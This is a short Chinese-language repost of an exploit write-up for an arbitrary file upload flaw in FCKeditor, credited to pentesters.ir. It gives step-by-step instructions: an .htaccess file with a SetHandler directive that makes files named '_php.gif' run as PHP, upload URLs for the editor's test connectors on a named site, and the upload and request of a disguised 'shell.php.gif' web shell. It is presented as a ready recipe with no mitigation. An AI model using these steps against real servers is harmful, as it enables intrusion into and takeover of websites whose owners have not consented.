转自Fans内二货的博客,源地址:http://honglousy.blog.sohu.com/182654619.html

FCKeditor all versian Arbitrary File Upload Vulnerability
发布时间: 2011
源码地址:http://sourceforge.net/projects/fckeditor/
漏洞作者: pentesters.ir
利用步骤:
1.创建一个htaccess文件:
代码内容:
<FilesMatch “_php.gif”>
SetHandler application/x-httpd-php
</FilesMatch>

2.实用编辑器上传htaccess文件.

http://www.badguest.cn/FCKeditor/editor/filemanager/upload/test.html

http://www.badguest.cn/FCKeditor/editor/filemanager/browser/default/connectors/test.html

3.上传shell.php.gif
4.上传后shell.php.gif, 会自动被改名为 shell_php.gif
5.访问http://www.badguest.cn/上传目录/shell_php.gif